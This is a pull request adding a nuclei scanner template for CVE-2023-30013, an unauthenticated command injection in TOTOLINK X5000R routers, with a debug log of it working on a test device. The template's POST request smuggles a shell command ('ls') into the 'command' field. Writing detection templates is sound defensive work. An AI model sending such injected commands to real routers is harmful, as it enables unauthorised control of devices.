### PR TITLE
Create CVE-2023-30013.yaml

### DIFF
--- a/http/cves/2023/CVE-2023-30013.yaml
+++ b/http/cves/2023/CVE-2023-30013.yaml
@@ -1,0 +1,45 @@
+id: CVE-2023-30013
+
+info:
+  name: TOTOLink - Unauthenticated Command Injection
+  author: gy741
+  severity: critical
+  description: |
+    TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-30013
+    - https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2023-30013
+    cwe-id: CWE-78
+    epss-score: 0.102540000
+    epss-percentile: 0.942680000
+    cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:*
+  tags: totolink,cve,cve2023,router,unauth,rce,iot
+
+requests:
+  - raw:
+      - |
+        POST /cgi-bin/cstecgi.cgi HTTP/1.1
+        Host: {{Hostname}}
+
+        {"command":"127.0.0.1; ls>../{{randstr}};#","num":"230","topicurl":"setTracerouteCfg"}
+
+      - |
+        GET /{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - ".sh"
+          - ".cgi"
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2023/CVE-2023-30013.yaml
+++ b/http/cves/2023/CVE-2023-30013.yaml
@@ -17,9 +17,9 @@ info:
     epss-score: 0.102540000
     epss-percentile: 0.942680000
     cpe: cpe:2.3:o:totolink:x5000r_firmware:9.1.0u.6118_b20201102:*:*:*:*:*:*:*
-  tags: totolink,cve,cve2023,router,unauth,rce,iot
+  tags: cve,cve2023,totolink,unauth,rce,intrusive
 
-requests:
+http:
   - raw:
       - |
         POST /cgi-bin/cstecgi.cgi HTTP/1.1
@@ -34,7 +34,14 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
-        part: body
+        part: body_1
+        words:
+          - "lan_ip"
+          - "reserv"
+        condition: and
+
+      - type: word
+        part: body_2
         words:
           - ".sh"
           - ".cgi"


### PR DESCRIPTION
### Template / PR Information

Hello,

Added CVE-2023-30013

```
TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contain a command insertion vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.
```
- References: https://nvd.nist.gov/vuln/detail/CVE-2023-30013

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

![image](https://github.com/projectdiscovery/nuclei-templates/assets/29292618/70ea119b-8051-4c68-81d4-46412d526aaf)

![image](https://github.com/projectdiscovery/nuclei-templates/assets/29292618/6b3523be-d067-488e-a3fe-fd932cc12746)

![image](https://github.com/projectdiscovery/nuclei-templates/assets/29292618/cd4359bd-48f8-4f0b-88a8-73e53a6aaad7)

```
$ nuclei -t CVE-2023-30013.yaml -u http://192.168.0.1 --debug

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13.4; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 102
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

{"command":"127.0.0.1; ls>../2W7n8eYnm8kR6cuEzZkIWLLfoQS;#","num":"230","topicurl":"setTracerouteCfg"}
[DBG] [CVE-2023-30013] Dumped HTTP response http://192.168.0.1/cgi-bin/cstecgi.cgi

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Date: Wed, 30 Sep 2015 16:45:26 GMT
Server: lighttpd/1.4.20

traceroute to 127.0.0.1 (127.0.0.1), 230 hops max, 38 byte packets
 1  localhost.localdomain (127.0.0.1)  2.265 ms  0.166 ms  0.678 ms
{
        "success":      true,
        "error":        null,
        "lan_ip":       "192.168.0.1",
        "wtime":        "0",
        "reserv":       "reserv"
}
[INF] [CVE-2023-30013] Dumped HTTP request for http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

GET /2W7n8eYnm8kR6cuEzZkIWLLfoQS HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: gzip

[DBG] [CVE-2023-30013] Dumped HTTP response http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS

HTTP/1.1 200 OK
Connection: close
Content-Length: 41
Accept-Ranges: bytes
Content-Type: application/octet-stream
Date: Wed, 30 Sep 2015 16:45:26 GMT
Etag: "878264423"
Last-Modified: Wed, 30 Sep 2015 16:45:26 GMT
Server: lighttpd/1.4.20


00000000  45 78 70 6f 72 74 53 65  74 74 69 6e 67 73 2e 73  |ExportSettings.s|
00000010  68 0a 63 73 74 65 63 67  69 2e 63 67 69 0a 63 75  |h.cstecgi.cgi.cu|
00000020  73 74 6f 6d 2e 63 67 69  0a                       |stom.cgi.|
[CVE-2023-30013:word-1] [http] [critical] http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS
[CVE-2023-30013:status-2] [http] [critical] http://192.168.0.1/2W7n8eYnm8kR6cuEzZkIWLLfoQS
```
